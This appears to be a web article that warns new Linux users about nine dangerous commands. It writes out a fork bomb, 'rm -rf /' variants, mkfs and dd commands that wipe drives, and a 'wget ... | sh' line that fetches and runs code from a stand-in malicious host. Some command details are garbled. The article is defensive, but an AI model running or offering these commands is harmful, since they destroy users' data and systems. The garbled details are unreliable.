9 Linux Commands & Codes To Be Wary Of

Linux shell/terminal commands are very powerful and just a simple command could lead to one deleting a folder, files or root folder, etc.

In some cases, Linux won’t even ask you for confirmation rather it will execute the command right away causing you to lose valuable data and information stored in these files and folders.

It is common for people to post content on the web recommending new Linux users to execute these commands. This might seem like a joke for someone who has posted the content but it’s no laughing matter for the person on the other end.

(Image Source: Desktop Nexus)

We’ve gathered some Linux commands that are quite harmful for your system to help you avoid them. Do keep in mind that they are indeed dangerous and can even be altered in a variety of ways to produce new commands to inflict more damage.

An important thing to note is that some of these commands are only dangerous if they are prefixed with sudo on Ubuntu. While on other distributions of Linux, most of these given commands will be dangerous to execute as root.

Take a look at the 9 commands and codes you should avoid executing.

1. Linux Fork Bomb Command

:(){ :|: & };: also known as Fork Bomb is a denial-of-service attack against a Linux System. :(){ :|: & };: is a bash function. Once executed, it repeats itself multiple times until the system freezes.

You can only get rid of it by restarting your system. So be careful when executing this command on your Linux shell.

2. mv folder/dev/null Command

mv folder/dev/null is another risky command. Dev/null or null device is a device file that discards all the data written on it but it reports that the writing operation is executed successfully. It is also known as bit bucked or black hole.

3. rm -rf command

rm -rf command is a fast way to delete a folder and its content in the Linux operating system. If you don’t know how to use it properly then it can become very dangerous to the system. The most common combinations and options used with rm-rf command are listed below:

  • rm command is used to delete the files in Linux system.
  • rm -f command removes read-only files in folder without prompting.
  • rm -r command deletes the content of a folder recursively.
  • rm -d command is used to remove an empty directory but it will refuse to remove directory if it is not empty.
  • rm -rf/ command is used for forced deletion (it deletes it even if it’s write protected) of all the content in root directory and sub folders.
  • rm -rf* command is used for forced deletion of all the content in the current directory (directory you are currently working in) and sub folders.
  • rm -rf. command is used for forced deletion of all the content in the current folder and sub folders. The rm -r.[^.]* command can also be used.
  • rm -i command is used for removal of files and folders but a prompt will appear before removal.

4. mkfs command

mkfs can be a dangerous command for your Linux based system if you don’t know its purpose. Anything written after the mkfs will be formatted and replaced by a blank Linux file system.

All the commands mentioned below will format the hard drive and it requires administrator rights:

  • mkfs
  • mkfs.ext3
  • mkfs.bfs
  • mkfs.ext2
  • mkfs.minix
  • mkfs.msdos
  • mkfs.reiserfs
  • mkfs.vfat

The command mkfs.cramfs will do the same thing as the above but it does not require administrator rights to execute.

5. Tar Bomb

The tar command is used for combining multiple files into a single file (archived file) in .tar format. A Tape Archive (Tar) bomb can be created with this command.

It is an archive file which explodes into thousands or millions of files with names similar to the existing files into the current directory rather than into a new directory when untarred.

You can avoid becoming a victim of a tar bomb by regularly creating a new protective directory whenever you receive a tar file and then moving the received tar file into this directory before untarring.

If the tar file is indeed a tar bomb then you can simply remove the newly created directory to get rid of it. Another way to avoid the explosion of a tar bomb is via the -t option to list all of the content of a tar file to give you an idea of the type of content contained within the tar file.

6. dd command

The dd command is used to copy & convert hard disk partitions. However, it can turn out to be harmful if you specify the wrong destination.

The command may be any one of these:

  • dd if=/dev/hda of=/dev/hdb
  • dd if=/dev/hda of=/dev/sdb
  • dd if=something of=/dev/hda
  • dd if=something of=/dev/sda

The following command will zero out the whole primary hard drive: dd if=/dev/zero of=/dev/had

7. Shell Script Code

Someone may victimize you by giving you the link to a shell script and endorsing you to download and execute it. The script may contain some malicious or dangerous code inside. The format of command may look like this: wget http://some_malicious_source -O- | sh. The wget will download the script while the sh downloads the script execution.

8. Malicious Source Code

Someone gives you the source code and asks you to compile it. The code may appear to be a normal code but in fact some malicious code is disguised in the large source code and it may cause harm to your system. To avoid being victimized by this kind of attack, only accept and compile your source code from trustworthy sources.

9. Decompression Bomb

You have received a compressed file and you are asked to extract this file which appears to be very small in size but may be a few KB. In fact, this small sized compressed file contains very highly compressed data.

Once the file is decompressed, hundreds of GB of data is extracted which can fill up your hard drive to bring down the performance of your system. To avoid this situation, always remember to accept data from trustworthy sources.